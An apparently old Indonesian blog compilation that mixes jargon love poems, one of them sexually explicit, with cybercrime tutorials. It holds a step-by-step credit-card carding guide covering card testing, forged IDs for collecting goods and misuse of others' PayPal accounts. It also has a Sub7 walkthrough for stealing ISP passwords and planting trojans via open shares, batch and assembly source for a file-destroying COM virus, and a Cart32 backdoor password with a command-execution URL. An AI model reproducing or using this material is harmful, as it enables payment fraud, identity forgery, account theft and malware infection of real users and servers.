Amplitudo gelombang hatimu berinterfensi dengan hatiku
Seindah gerak harmonik sempurna tanpa gaya pemulih
Bagai kopel gaya dengan kecepatan angular
yang tak terbatas...

Energi mekanik cintaku tak terbendung oleh friksi
Energi potensial cintaku tak terpengaruh oleh tetapan gaya
Energi kinetik cintaku = -mv~
Bahkan hukum kekekalan energi tak dapat
menandingi hukum kekekalan di antara kita

Lihat hukum cinta kita
Momen cintaku tegak lurus dengan momen cintamu
Menjadikan cinta kita sebagai titik ekuilibrium yang sempurna
Dengan inersia tak terhingga
Takkan tergoyahkan impuls atau momentum gaya
Inilah resultan momentum cinta kita...

[+/-] terus diwoco bang...!!!!

Puisi Seorang Accounting

Wahai Kekasihku...
Debetlah cintaku di neraca hatimu
Kan ku jurnal setiap transaksi rindumu
Hingga setebal Laporan Keuanganku

Wahai kekasih hatiku...
Jadikan aku manager investasi cintamu
Kan ku hedging kasih dan sayangmu
Di setiap lembaran portofolio hatiku
Bila masa jatuh tempo tlah tiba
Jangan kau retur kenangan indah kita
Biarlah ia bersemayam di Reksadana asmara
Berkelana di antara Aktiva dan Passiva

Wahai mutiara kalbu ku....
Hanya kau lah Master Budget hatiku
Inventory cintaku yang syahdu
General Ledger ku yang tak lekang ditelan waktu

Wahai bidadariku....
Rekonsiliasikanlah hatiku dan hatimu
Seimbangkanlah neraca saldo kita
Yang membalut laporan laba rugi kita
Dan cerahkanlah laporan arus kas kita selamanya
Jika di hari closing nanti, Tidak ada kecocokkan saldo
mungkin cinta kita harus dijurnal balik...

[+/-] terus diwoco bang...!!!!

Puisi seorang maniac SeX (18++)

Ku bahagia berjalan diatas panggung dunia
ku goda wanita wanita yang tergiur harta dan tahta
ku ajak dirinya untuk menemaniku diatas ranjang tercinta
ku kecup bibir bawah yang merah merona

diriku dipenuhi nafsu birahi yang tiada bisa kutahan lagi
dalam diam kucoba mendaki gunung yang tinggi
tersentak ku terhenyak bangkit dari mimpi
mimpi yang sangat membuat birahiku menjulang tinggi bagai pelangi

ku raba ku cium ku dekap tiada henti
kedua buah yang membuatku terhipnotis selama ini
kucoba menuruni lembah meminum di mata air yang murni
ku coba menjulurkan lidah tuk nikmati segarnya mata air yang kucari

ku tersadar bangkit menuju alam fana
ku didera oleh pesona kecantikan wanita
tiada letih ku memompa tiada lelah ku meronta
kini ku masuk lebih dalam larut akan hangatnya asmara

crrrrrooooooot

perlahan kucoba tuk bertahan
rasa nikmat yang membuatku masuk dalam lamunan
ku muntahkan segala nafsu setan
ku sebarkan benih cinta, ku rangkul kau didalam pelukan

[+/-] terus diwoco bang...!!!!

puisi seorang hacker

Seandainya hatimu adalah sebuah system, maka aku akan scan kamu
untuk mengetahui port mana yang terbuka Sehingga tidak ada keraguan
saat aku c:\> nc -l -o -v -e ke hatimu,tapi aku hanya berani ping
di belakang anonymouse proxy, inikah rasanya jatuh cinta sehingga
membuatku seperti pecundang atau aku memang pecundang sejati whatever!

Seandainya hatimu adalah sebuah system,
ingin rasanya aku manfaatkan vulnerabilitiesmu, pake PHP injection
Terus aku ls -la; find / -perm 777 -type d,sehingga aku tau kalo
di hatimu ada folder yang bisa ditulisi atau adakah free space buat
aku?. apa aku harus pasang backdor "Remote Connect-Back Shell"jadi
aku tinggal nunggu koneksi dari kamu saja, biar aku tidak merana
seperti ini.

Seandainya hatimu adalah sebuah system,
saat semua request-ku diterima aku akan nogkrong terus di bugtraq
untuk mengetahui bug terbarumu maka aku akan patch n pacth terus,
aku akan jaga service-mu jangan sampai crash n aku akan menjadi
firewallmu aku akan pasang portsentry, dan menyeting error pagemu
" The page cannot be found Coz Has Been Owned by Someone get out!"
aku janji gak bakalan ada macelinious program atau service yang
hidden, karena aku sangat sayang dan mencintaimu.

Seandainya hatimu adalah sebuah system,
jangan ada kata "You dont have permission to access it" untuk aku,
kalau ga mau di ping flood Atau DDos Attack jangan ah....! kamu
harus menjadi sang bidadari penyelamatku.

Seandainya hatimu adalah sebuah system, ...?

Tapi sayang hatimu bukanlah sebuah system,
kamu adalah sang bidadari impianku, yang telah mengacaukan systemku!
Suatu saat nanti aku akan datang n mengatakan kalau di hatiku
sudah terinfeksi virus yang Menghanyutkan, Ga ada anti virus yang
dapat menangkalnya selain ...kamu.

[+/-] terus diwoco bang...!!!!

Puisi cinta seorang dokter

Puisi Cinta Seorang Dokter. Mataku berakomodasi tak percaya...
Benarkah yang tertangkap oleh nervi optici-ku??
Dalam sms mu...
Katamu, akulah nukleus kehidupanmu...
Katamu, jika kau flagelatta, maka akulah ATP...
Katamu, jika kau inflamasi, akulah prostaglandin...
Sadarkah kau??
Kau berhasil membuatku mengalami hipertensi
fisiologis dan tachycardi
Perintahkan membrana tympani mu mendengar
seluruh discuss vertebralis ku berkata...
"Setiap cardiac outputku membutuhkan
pacemaker darimu.
Setiap detail gerakan glossus mu merangsang
saraf simpatisku."
"Ucapan selamat malammu laksana diazepam...
Ucapan "jangan menangis, sayang"mu bagaikan
valium bagiku...
Dan ketika kau pergi...terasa bagaikan
imunosupresi untukku..."
Apa yang terjadi padaku??
Cinta kau bilang??
Tak pernah kudengar Dorland mengucapkannya...
Di jurnal mana aku bisa memperoleh Randomised
Control Trial dengan Double Blind tentang nya??

Diagnosa aku...
Infus aku dengan cairan elektrolit "aku milikmu"...
Dan kita akan mengaktivasi seluruh sistem organ
kita bersama-sama...
Sampai brain stem death memisahkan kita...

[+/-] terus diwoco bang...!!!!

carder

....bukan maksud utk menggurui rekan carder Indonesia lainnya, maka dgn segala kerendahan hati kami mencoba utk membagi Tips dan Tricks ini utk rekan - rekan yg ingin mencoba terjun dalam kegiatan carding....

...:::Bagi rekan carder yg memiliki nomor extrapolate, dpt mencoba membuat e-mail bayar pada Network Solutions (www.networksolutions.com) dgn tdk menambah account (JANGAN klik menu pull down : add 1 account e-mail. Sebab kita memanfaatkan NetSol hanya utk mengetahui nomor extrapolate tsb masih berlaku atau tidak), ikuti prosedur selanjutnya, sampai pada sesion pemasukan nomor tadi. Ulangi pengisian nomor apabila ditolak, gunakan nomor lainnya. Jika anda merasa sulit untuk validasi di NetSol (saat ini semakin sulit), kami mencoba memberikan alternatif URL yang dapat anda jadikan referensi dalam hal daftar perusahaan-perusahaan register domain (hanya utk test nomor kartu kredit), yaitu pada www.internic.org/regist.html Atau dpt juga membeli software - software murah di situs - situs penjual software:::...

...:::Anda dpt mengunjungi toko - toko yg ada pada website ini, yg sebagian besar telah kami coba. Dan jgn khawatir, keterangan disamping tokonya adalah pengalaman kami sebenarnya. Masalah sedikit banyaknya yg sudah mengorder di toko tersebut, kami tdk jamin 100%, namun perlu diketahui bhw situs ini tadinya situs pribadi. Jadi sebelum publikasi, hanya "bA" yg mengorder, dan barang yg diorder kuantitasnya minimal sekali, namun rutin (lihat pada halaman 1 daftar online shop, toko timeclub.com yg berkali-kali mengirim barang dlm kurun waktu 1 tahun terakhir ini/th2000):::...

...:::Anda dpt mengorder barang senilai LEBIH DARI US$ 1000 dgn menggunakan trick : *Gunakan identitas palsu pada saat mengambil barang di kantor pos atau jasa pengiriman lainnya (....dgn memalsukan KTM/Kartu Tanda Mahasiswa biasanya lebih mudah, dan foto yg tampak di KTM palsu tadi harus sesuai dgn wajah si "X" yg mengambil barang tsb, di kantor pos atau jasa pengiriman lain). Sedangkan namanya, tetap nama si "X", hanya alamat di kartu identitas yang kita palsukan. Jika ditanya kenapa alamatnya berbeda, alasannya : "....itu alamat lama, dan saya sudah pindah rumah/kost". Apabila nama si "X" (pengambil barang) berbeda dengan nama yang dikirimi barang (hasil dari order), biasanya pihak kantor pos atau jasa pengiriman lainnya akan meminta surat kuasa:::...

...:::Anda dpt mengorder barang senilai US$ 500 dgn menggunakan trick : (bisa juga menggunakan trick diatas) *Bisa menggunakan nama dan alamat asli, karena order barang senilai US$ 500 masih tergolong rendah, atau gunakan alamat Warung Internet (Warnet) tempat anda biasa mengakses (tentunya bekerja sama dengan si penjaga Warnet tsb.):::...

...:::Anda dpt mengorder barang kurang dari US$ 200 dgn aman apabila nomor tersebut bukan milik orang di Indonesia:::...

...:::Apabila anda menggunakan nomor extrapolate yg sudah digunakan pada saat proses validasi di Network Solutions, berarti nomor tersebut telah dicharge sebesar yg anda masukkan tadi, makanya buat serendah - rendahnya dlm membuat domain tadi, misalnya .org (..sekitar US$ 60). So, kalo udah gitu, utk mengetahui besarnya biaya charge dari nomor tsb tinggal jumlahkan aja harga barang yg diorder dengan biaya yg udah dicharge di NetSol tadi. Bila harga barang yg diorder senilai US$ 45, berarti nomor extrapolate yg kita gunakan tsb sudah dicharge sebesar US$ 105:::...

...:::Pada saat proses order (shopping), pengisian data Nama, Alamat dan lainnya milik kita (pembeli/shopper), harus sama dengan alamat yg akan dikirimi barang. Misalnya, si "X" mengorder barang, maka pengisian Billing Address (alamat faktur si pemesan) dan Shipping Address (alamat tujuan pengiriman barang) HARUS SAMA. Jika dlm billing address yg memesan barang atas nama "X", maka pengisian nama pada shipping address harus nama si "X" tadi:::...

...:::Jika anda tinggal di Propinsi D.I. Yogyakarta, sebaiknya alamat pengiriman barang jgn dikirim ke Kota Gudeg tsb. Karena apabila anda tidak ada kongkalikong dengan pihak kantor pos atau jasa pengiriman lainnya, jgn pernah mengharap barang akan datang. Apa lagi untuk barang - barang yg tergolong 'wah', namun jika majalah dan CD serta sejenisnya, kemungkinan besar masih bisa. Sebagai masukan, Yogyakarta menduduki peringkat ke-1 dlm event kegiatan carding di Asia, sementara Indonesia sendiri menduduki peringkat III dunia masih dlm event kegiatan carding. Bahkan dalam waktu dekat, Indonesia mungkin bisa meraih peringkat I di dunia:::...

...:::Besarnya biaya penebusan dpt bervariasi, tergantung dari (pajak) barang yg kita order (biasanya mulai dari Rp 3000,- sampai lebih dari Rp 100.000,-). Atau ada juga barang yg dikirim langsung ke alamat tujuan. Jangan takut dulu bila anda disuruh menebus dgn biaya tinggi, karena kemungkinan besar barang yg dikirim itu nilainya lebih dari biaya penebusan:::...

...:::Dalam pengisian alamat e-mail (milik kita) utk jalur konfirmasi dari pihak online shop, sebaiknya gunakan alamat 'e-mail bayar'. Karena, selain tidak ada banner (menghemat waktu loading), ada sedikit nilai tambah di mata pihak online shop yg kita order barangnya:::...

...:::Tidak semua online shop yg ada lambang VeriSign di websitenya aman dan ketat dalam proses validasi kepemilikan kartu kredit, jadi jangan patah semangat dulu. Kecuali, pihak online shop melibatkan pihak Pay Pal (pihak ketiga sbg perantara yg menangani sistem pembayaran), itu pun masih bisa kita akali. Caranya, manfaatkan account milik orang bule juga di Pay Pal, lalu gunakan saja dgn percaya diri penuh, seolah - olah kita yg punya account tsb:::...

...:::Jika anda shopping di online shop selain yg berbahasa Inggris, sebaiknya diperhatikan metode pembayarannya/payment sistem/payment methode (kecuali anda menguasai bahasa di negara online shop tsb). Karena jika anda tidak teliti, bisa - bisa anda memilih metode pembayaran
...:::Bila anda mendapat e-mail konfirmasi dari pihak online shop berupa ancaman (..beberapa waktu setelah anda melakukan order), yg mengatakan mereka akan mengadukan perbuatan anda ke federasi/organisasi internasional yg menangani penipuan (fraud) kartu kredit dan akan mengenakan denda sebesar US$ 1000 atas perbuatan anda, jangan takut dulu. Karena itu hanya geretak si customer service online shop aja. Sebab kemungkinan besar, pihak online shop tsb sudah pernah terkena biaya recharge (tagihan balik, alias mengganti biaya produksi kepada si pemilik nomor kartu kredit yg asli). Nah, cuekin aja deh solusinya, masih bejibun online shop yang lain:::...

...:::Jika anda dikirimi email konfirmasi dari pihak online shop berupa e-mail kosong, namun ada file berekstensi .exe yg disertakan di attachment, lebih baik jangan didownload/dieksekusi file tadi. Apalagi jika anda yg mengakses Internet dari rumah (bukan di tempat umum), karena kemungkinan besar file tersebut mengandung trojan. Bila yang mengakses dari tempat umum (misalnya Warnet) dan sudah terlanjur mendownload/mengeksekusi file tersebut, sebaiknya anda berhenti mengakses. Dan pindahlah ke komputer client lainnya, atau bila ingin lebih fresh, pindah ke Warnet lain. Sedangkan jika anda mengakses Internet dari rumah, untuk menjaga kemungkinan dari bahaya trojan, anda bisa menginstall ulang sistem operasi pd komputer anda (dgn asumsi, anda harus menghapus bersih folder sistem operasi anda tersebut sebelum reinstall), dengan sistem operasi yg masih fresh:::...

...:::Catat semua barang yg anda order, dan dikirim atas nama siapa, jgn lupa catat juga tanggalnya. Sebab banyak juga online shop yg tdk mengirimkan e-mail konfirmasi ketika barang akan dikirim. Atau bahkan tidak mengirimkan e-mail konfirmasi kepada kita, saat setelah melakukan order (email konfirmasi biasa, setelah kita order). Gunanya, apabila ada order yg berhasil dikirim, dan atas nama si "X", kita bisa memperkirakan barang apa yg datang, dgn melihat catatan tadi, bhw si "X" memesan barang a, b, atau c (jadi ada nilai kemungkinannya):::...

...:::Jika anda disebut sebagai thief, frauder, etc., pada e-mail konfirmasi dari online shop, cuekin aja, jangan dibalas, karena masih banyak online shop lainnya:::...

...:::Setiap order yg berhasil (barangnya datang), biasanya anda mendapat surat panggilan dari Kantor Pos atau Jasa Pengiriman (<== via telepon) lainnya utk menebus barang tersebut (..utk barang yg kecil biasanya langsung dikirim ke alamat tujuan). Tebuslah barang tsb !! (Apalagi jika anda mengorder barang dalam jumlah besar), guna menjaga kemungkinan barang tsb dialihkan ke Kantor Polisi atau pihak berwenang lainnya:::...

...:::Hindari pemesanan/order yang besar - besar terutama untuk merk - merk terkenal dan mahal, serta perlu diperhatikan JUMLAH barang yg diorder dalam satu kali transaksi, karena jika terlalu banyak dapat menimbulkan kecurigaan pihak online shop/store:::...

...:::Jadilah orang yg sabar, hindari pemesanan yang menggunakan pengiriman express. Sebab, untuk menjaga kewajaran dalam pengeluaran dana dari nomor kartu kredit yg digunakan tersebut. Sehingga pihak online shop/store, berprasangka bahwa kita orang yg cukup memperhitungkan pengeluaran dana:::...

...:::Kesabaran, ketelitian, dan keuletan merupakan modal dasar yg hrs anda miliki. Hilangkan sifat takabur, karena hanya akan mendatangkan kehancuran. Siapkan percaya diri sepenuhnya, seakan - akan kita si pemilik nomor/account (hal ini sangat baik dalam pembentukan mental carder):::...

...:::Kalo ada waktu, cobalah stand by di channel #indocarder, #yogyacarding, atau anda bisa bergabung pada Forum Diskusi Carder Indonesia di website kami. Jika memiliki kendala atau masukan utk dibahas bersama dengan carder lainnya, guna mengetahui situasi yg sedang terjadi di dunia carding Indonesia:::...

...:::Pelajari teknik hacking/cracking step by step:::...

...:::Jangan lupa berdoa kepada Tuhan YME, sesuai dgn agama dan kepercayaan anda. Semoga kita semua dalam lindungan-Nya. Amin:::...

[+/-] terus diwoco bang...!!!!

saya hanya ingin menegaskan bahwa artikel ini hanyalah sebuah abstraksi yang saya gambarkan untuk mempermudah pemahaman kita mengenai cara pendeteksian kelemahan atau celah sebuah sistem dan BUKAN untuk diterapkan!!! namun dengan gambaran ini saya harap para Admin ISP manapun juga dapat memperketat proteksinya.. =)

Untuk memulai percobaan pastikan anda telah mendownload beberapa tool berikut ini :

1. mIRC v x.x (berapa aja boleh)
2. Legion - Open Share Scanner v.2.1
3. Sub-7 Defcon Edition v.8
4. Sub-7 v.2.2

Cara pertama buka mIRC lalu masuklah ke channel lokal, lalu lakukan /whois ke beberapa orang sampai anda mendapatkan ISP yang anda inginkan.

misal : abo3ng is abo3ng@202-159-182-191.client.indo.net.id * Be Bo3nx

berarti kini telah kita dapatkan satu target yg menggunakan indosat sbg ISPnya, sekarang lakukan /dns pada 202-159-182-191.client.indo.net.id sbg hostnya, maka dalam beberapa saat akan muncul

*** Resolved 202-159-182-191.client.indo.net.id to 202.159.182.191

Setelah itu kita tinggal mengkonversi hasil tadi ke network kelas C, sehingga menjadi 202.159.0.0, ini adalah target kita yang sesungguhnya. Buka Sub7 2.2 lalu masuk ke Connection > Scanner > Local Scanner. Masukkan Start IPnya dengan 202.159.0.0 dan 202.159.255.255 sebagai akhirannya, lalu klik scan. Proses ini membutuhkan waktu yang lumayan lama, setelah berhasil, buka Sub7 Defcon dan masukkan hasil tadi ke field di atas, lalu klik connect. Jika anda diminta password u/ mengaksesnya maka lupakan saja, namun bila ia tidak meminta password, mulailah tersenyum karena kita ada sedikit kerjaan menarik disini. Pertama yang harus kamu lakukan adalah masuk ke Advance > Passwords > Retrieve RAS Passwords. Di dalam sini listing username dan password ISP berceceran dan siap u/ kita pungut, tapi pastikan anda telah mengetahui dial up access number ke ISP tsb (bisa juga anda cari di situs ISPnya). Selanjutnya masuk ke Connection > Server Options lalu set password, kita tidak mengingink!
an orang lain connect ke internet ketika kita sedang membajak accountnya. Aktifkan IP Notify sedemikian rupa sehingga anda dapat membuat server melakukan scan u/ anda jika dibutuhkan, ISP terkadang mengontrol orang iseng yang melakukan scanning dan menangkapnya!

Saya setuju bila hacker2 kelas kakap mengatakan bahwa menggunakan Sub7 u/ mencuri account hanyalah u/ orang dungu, tapi saya lebih suka cara ini daripada harus menghadapi resiko yang tinggi yang menyebabkan kita masuk penjara bahkan sebelum kita mencapai target. Bila anda bertanya mengapa menggunakan Sub7 2.2 hanya u/ scanning?!? Yah, paling tidak ini adalah scanner yang cukup handal dibanding Defcon, meski ia tidak mengizinkan IRC Bot atau IP Notify =) -Mad

Cara kedua adalah dengan mencari Open share dan mengupload trojan. Untuk melakukan ini buka Legion Scanner dan lakukan scan pada range misal 202.159.0.0 s/d 202.159.5.255 ketika muncul hasil dari scan tadi masuk ke My Computer alamatnya menjadi \\ diikuti dg IP, contohnya seperti ini \\202.159.4.128 lalu tunggu sejenak proses loading dan setelah itu anda mungkin akan diminta password untuk mengaksesnya, bila iya lupakan IP tadi dan lanjutkan scanning. Ketika anda mendapati address yang tidak meminta password, lihatlah namanya, lalu cari akses ke drive 'C' jika anda mendapatkannya, masuklah ke dalam drive tersebut, lalu akses windows > start menu > programs > startup, lalu paste trojan server kedalamnya, pastikan trojan yang anda kirimkan ke drive tsb tidak memiliki tampilan yang mencurigakan saat bekerja misalnya mengeluarkan window atau logo pembuatnya dll. Yang perlu anda lakukan berikutnya adalah bikin secangkir kopi sambil relax menunggu lawan merestart komputernya dan k!
emudian menghapus jejak yang ada di startup lawan ketika data yang kita butuhkan di komputer lawan telah kita dapat =P mudah bukan? -Mad

[+/-] terus diwoco bang...!!!!

about virus1

Virus adalah penyakit yang tidak bisa di berantas secara tuntas sejak dahulu. Kini kita akan melihat teknik bagaimana virus tersebut bisa dibuat.



Perhatian
Program dibawah ini dapat menulari sistem, tetapi dengan cara yang cepat dapat diketahui.Berikut ini adalah saran – saran yang harus selalu di perhatikan pada waktu bereksperimen dengan virus:

1. Bekerjalah hanya pada file cadangan (backup).
2. Cegahlah jangan sampai virus – virus atau program –program yang sudah ditulari jangan ketangan orang lain (tertular).
3. Setelah percobaan, hapuskan semua program – program yang telah ditulari.
4. Hendaknya hard disk dilindungi terhadap penulisan yang tidak diharapkan, dengan menggunakan instruksi DOS, ASSIGN.

Ketiklah instruksi berikut ini dibelakang prompt DOS:
A> assign c=a (disket master DOS pada drive A)
Dengan jalan ini maka semua tindakan yang ditujukan kepada hard disk, diarahkan ke drive A. Perlindungan ini tidak benar – benar rapat, tetapi dapat mencegah sebagian besar virus – virus yang menyerang hard disk .Untuk mendapatkan kembali keadaan normal, tuliskan : “assign c=c” sementaradisket master DOS berada di drive A. Kalau syarat diatas dipatuhi pada waktu anda bekerja dengan program virus, maka tak akan ada bahaya karena penularan –penularan yang tidak disengaja.

1. VIRUS KOMPUTER DALAM BATCHFILE

Sebagai awal dalam mempelajari pemrograman virus komputer , berikut ini akan ditampilkan virus komputer dalam bentuk batchfile.Virus ini memanfaatkan fasilitas dari DOS, dengan memanggil instruksi – instruksi file internal dan eksternal. Instruksi – instruksi file internal (instruksi yang merupakan “bagian dalam” dari modul sistem operasi tempat modul tersebut dipindahkan ke memori-internal/RAM pada saat boot) digunakan sesuai dengan hukum-instruksi dalam batchfile.Untuk instruksi – instruksi file eksternal seperti DEBUG dan EDLIN, harus disediakan file-file yang diperlukan.Disamping itu virus ini juga memanfaatkan pemilihan arah bagi operasi masukan dan keluaran dalam PC-DOS(I/O redirection).Virus in hanya menyerang file – file yang berekstensi COM.

Seperti yang telah kita ketahui bersama bahwa sebuah virus mempunyai 5 buah kemampuan, yaitu :kemampuan mendapatkan informasi, kemampuan memeriksa program, kemampuan menggandakan diri dan menularkan, kemampuan menyembunyikan diri. Dari kelima buah kemampuan tersebut hanya 2 kemampuan yang dimiliki oleh virus batchfile yang akan saya bahas disini, yaitu kemampuan mendapatkan informasi serta kemampuan menggandakan diri dan menulari file yang lain. Meskipun demikian, virus ini sudah dapat bekerja karena kedua kemampuan tersebut merupakan inti dari sebuah virus komputer, sedangkan kemapuan yang lain hanyalah tambahan.

Bila ditinjau dari jenisnya, maka virus bacthfile ini adalah virus yang bersifat menumpangi program yang ditularinya. Dengan demikian suatu program yang telah tertular virus ini menjadi tidak dapat dipakai lagi, karena telah dirusak oleh virus.

2. ALGORITMA

Misalkan virus bacthfile tersebut bernama LAMMER.BAT, maka LAMMER.BAT harus mengandung runtun isntruksi yang mampu melakukan kegiatan – kegiatan sbb:

1. Mencari file COM yang pertama dalam directory (kalau ada)
2. Menghapus file tersebut
3. Menyalin (copy) file LAMMER.BAT ke file dengan nama seperti nama file yang tadi dihapus, tapi dengan ekstensi BAT

Dengan demikian sesudah penularan, isi dari file yang ditulari adalah persis sama dengan file LAMMER.BAT.Sehingga pemanggilan terhadap file yang tertular mempunyai akibat sama dengan memanggil file LAMMER.BAT.

3. BAGAN ALIR




4. Listing Program

Batchfile dibawah ini merupakan implementasi dari alir bagan diatas.

NAMA FILE: LAMMER.BAT

Echo off --> (Keluaran ke layar dihadang, sehingga pekerjaan yang dilakukan oleh batchfile tidak tampak oleh pemakai)

Ctty nul ----> (Masukan dan keluaran diubah arahnya ke NUL -device)

Dir *.com/w.daftar ---> (Nama dari semua file dengan ekstensi .Com dalam directory yang aktif ditulis dalam file DAFTAR.pilihan “/w” akan membuat tanggal dan panjangn file tidak ditampilkan)

Edlin daftar<\1 ---> (EDLIN mendapat masukan dari perintah-perintah dalam file instruksi “1” untuk menyunting file DAFTAR)

Debug daftar<\2 ---?(DEBUG memanggil DAFTAR dan melaksanakan perintah-perintah dari file 2, untuk membuat bacthfile PERINTAH.BAT)

Edlin perintah.bat<\3 ---?(Text editor EDLIN memanggil file PERINTAH.BAT dan file instruksi ketiga)

Del daftar.* --->(File DAFTAR DAN DAFTAR.BAK dihapus)

Del perintah.bak --->(File PERINTAH.BAK dihapus)

Ctty con ---->(Masukan dan Keluaran kembali ke keyboard dan layar, tetapi layar tetap kosong (echo off)

Perintah --> (File PERINTAH.BAT dipanggil.Bila virus sudah menulari file ASSIGN.COM, maka PERINTAH.BAT berisi sbb:
DEL ASSIGN.COM
COPY \LAMMER.BAT)



3 buah file instruksi dengan nama “1”, “2” dan “3” (tanpa ekstensi) berhubungan dengan file batchfile :LAMMER.BAT diatas,sbb:

NAMA FILE : 1

1,4d
e

NAMA FILE : 2

M100,10b,f000
E108 “.bat”
M100,10b,f010
E100”DEL”
Mf000,f00b,104
E10c 2e
E110 0d,0a
Mf010,f020,11f
E112 “COPY \LAMMER.BAT”
E12b 0d,0a
Rcx
2c
nperintah.bat
w
q






NAMA FILE 3:

Maaf file instruksi ketiga tidak dapat ditulis di bagian ini karena mengandung dua kali Ctrl-Z (hex 1Ah) dan Saya sendiri udah capek nulisnya hehehehe….maklum blom minum jamu kuat :) hehehe…hehe
Gunakan kreatifitas anda sebagai programmer :) :) :)

Demikianlah beberapa informasi pengetahuan ttg virus komputer dalam file batchfile.Semoga apa yang saya sampaikan disini dapat berguna bagi teman – teman yang pengen memahami teknik pemrograman virus dan pembuatannya.
Dan jangan lupa untuk tetap Menantikan Artikel saya selanjutnya kekeee……kekeke :) :) :)

[+/-] terus diwoco bang...!!!!

password backdoor

Info mengenai CART32.exe password backdoor bug :

Name of the bug : Cart32 secret password backdoor
Affected Systems : Semua jenis web server dengan Cart32 versions 3.0 (versi paling uptodate) and 2.6 terpengaruh yg ber basis Win32
Issue : Attackers can run arbitary commands on the web server and/or gain access to credit card information.
Authors : David Litchfield (mnemonix@globalnet.co.uk) and Mark Litchfield (xor-syst@devilnet.co.uk)

The Cerberus Security Team telah menemukan security hole pada McMurtrey/Whitaker & Associates, Inc's Win32 e-Commerce shopping cart,yg lebih dikenal dengan nama Cart32 (http://www.cart32.com/ ). Tentunya aplikasi ini dapat lebih ok jika disebut sebagai “pintu belakang” untuk mendapatkan informasi credit card.
Pada cart32.exe ini file yg menyediakan function utama untuk aplikasi ini dapat digunakan untuk mendapatkan password yg tersembunyi dan dengan file ini pula hacker dapat menjalankan command pada server contohnya seperti mendapatkan credit card customer pada shopping cart properties secara detil termasuk juga di dalamnya alamat pengirim dan informasi rahasia lainnya.

Detail

Pada cart32.exe terdapat backdoor password yaitu “wemilo”(ditemukan pada offset 0x6204h) yg merupakan Cart32 internal password (pada dasarnya client mereka merupakan shopping site)

Code dapat dijalankan melalui command pada saat konfirmasi belanjaan :

http://charon/scripts/c32web.exe?TabName=Cart32%2B&Action=Save+Cart32%2B+Tab&
SaveTab=Cart32%2B&Client=foobar&ClientPassword=e%21U%23_%25%28%5D%5D%26%25*%2B-a&
Admin=&AdminPassword=&TabToSave=Cart32%2B&PlusTabToSave=Run+External+Program&UseCMDLine=Yes&
CMDLine=cmd.exe+%2Fc+dir+%3E+c%3A%5Cfile.txt

URL ini akan setting property dari shell cart, sehingga menghasilkan listing directory dan pipe output ke text file yaitu file.txt pada root C: pada saat pembelian di konfirmasi.
Setelah melakukan hal ini hacker akan melakukan step berikutnya yaitu menciptakan suatu order dan konfirmasi palsu utk di executed.
(Note. Perlu anda ketahui bahwa contoh URL di atas berhubungan dengan server Cerberus –detil password dan client perlu diubah jika ingin mencobanya pada site lain)

Solusi :

Berdasarkan hasil testing Cerberus labs :

Download Hex Editor, cthnya seperti UltraEdit (http://www.ultraedit.com) dan ganti password “wemilo” menjadi yg lain.
c32web.exe merupakan program administrasi pada Cart32 dan hanya diakses oleh Administrator maka anda harus set permission ke file ini (dan tentu saja dengan NTFS setting) sehingga file ini tidak dapat dijalankan oleh pihak lain selain admin. Untuk server yg menggunakan Windows95 atau 98, file ini sebaiknya di hapus.
That's all we can tell you guyzzz.

[+/-] terus diwoco bang...!!!!

about virus

Bila dibandingkan dengan virus bacthfile, yang pernah kita bicarakan maka virus yang kita bahas sekarang ini telah memiliki kelima kemampuan


1. Pendahuluan

Virus komputer yang akan dibicarakan dibawah ini ditulis dalam bahasa assembley.Bila dibandingkan dengan virus bacthfile, yang pernah kita bicarakan maka virus yang kita bahas sekarang ini telah memiliki kelima kemampuan seperti apa yang telah saya sampaikan terdahulu.
Virus ini mampu mencari semua file COM yang ada pada disket, serta memeriksanya apakah telah tertular atau belum.Bila belum, maka virus akan menularinya.Routine manipulasi yang dimiliki virus ini hanyalah berupa tampilan pesan :”File ini telah tertular Virus komputer!” atau “Semua file COM pada disket ini telah tertular virus komputer!!!”.
Berbeda dengan virus batchfile yang menghasilkan file baru dan membutuhkan beberapa file untuk menjalankannya, maka virus yang akan kita bahas ini nantinya dapat bekerja sendiri dan tidak menghasilkan file baru, sehingga kemampuan menyembunyikan diri dari virus ini lebih baik.
Seperti halnya virus batchfile, virus dibawah ini adalah termasuk jenis virus yang menumpangi program yang ditularinya.Dengan demikian virus ini bersifat merusak.

2. Algoritma

Algoritma yang digunakan adalah sbb:
1.cari file COM yang pertama
2.buka dan baca file tersebut, letakkan pada buffer (di RAM)
3.Dengan membandingkan tanda pengenal virus dan rangkaian byte bagian awal dari program, periksa apakah file tersebut telah tertular virus atau belum.
4.a) Bila belum, maka tulari file tersebut dengan jalan menyalin seluruh program virus ke file tersebut (menumpangi).Kemudian tampilkan pesan :”File ini telah tertular Virus Komputer !”
b) Bila sudah, maka carilah file COM berikutnya.Ulangi langkah 2.
5.Jika semua file COM telah tertular, maka tampilkan pesan : “semua file Com pada disket ini telah tertular virus komputer!!!”


3. Program dan Mekanisme Penularan

Program dibawah ini merupakan implementasi dari bagian diatas.

Catatan : Program virus ini menggunakan instruksi macro.Definisi macro yang digunakan terdapat pada file LAMMER.MAC.(klo pengen liat file macronya kirim email ke Dr`Ponidi@crackdealer.com)

;------------------------------------------------------------------------------
; LAMMER.ASM
;
;CODE BY : #DEFACE-TEAM@IRC.DAL.NET
; #DHEGLENG@IRC.DAL.NET
;
;RETRIEVAL SYSTEM BY: DR`PONIDI@CRACKDEALER.COM
;
;VIRUS INI MENYERANG DAN MERUSAK SEMUA FILE COM.
;BERHATI-HATILAH!
;------------------------------------------------------------------------------



IF1
INCLUDE LAMMER.MAC
ENDIF
Code_seg SEGMENT
ASSUME CS:Code_seg
ORG 100h
Mulai : jmp kerjakan
Identitas DB `File ini telah tertular virus komputer !$`
Peringatan DB `semua file COM dalam disket ini telah tertular virus`
DB `Komputer !!!$`
File_COM DB`*.com`,0h
Nama_file DB 13 DUP(?)
Panjang_id equ 45
Panjang_vir equ 445
Atribut equ 20h
Open_code equ 2
Jumlah equ 0ffffh
DTA DB43 DUP(20h)

Kerjakan : Set_DTA DTA
Mov ax,0
Find_first file_COM,Atribut
Masih_adakah: cmp ax,0
Je Laksanakan
Cmp ax,2
Je Keluar
Tulis_string peringatan
Jmp Keluar
Keluar : Ke_dos
Laksanakan : mov si,offset DTA + 30
Pindahkan_string 13,nama_file
Buka_file_DTA DTA,Open_code
Push bx
Baca_file bx,Buffer,jumlah
Push ax
Mov di,offset Buffer + 3
Bandingkan-string Identitas,panjang_id
Cmp bx,0
Je Cari_lainnya
Mov si,100h
Pindahkan_string panjang_vir,Buffer
Pop ax
Pop bx
Push ax
Tutup_file bx
Hapus_file Nama_file
Buat_file Nama_file,Atribut
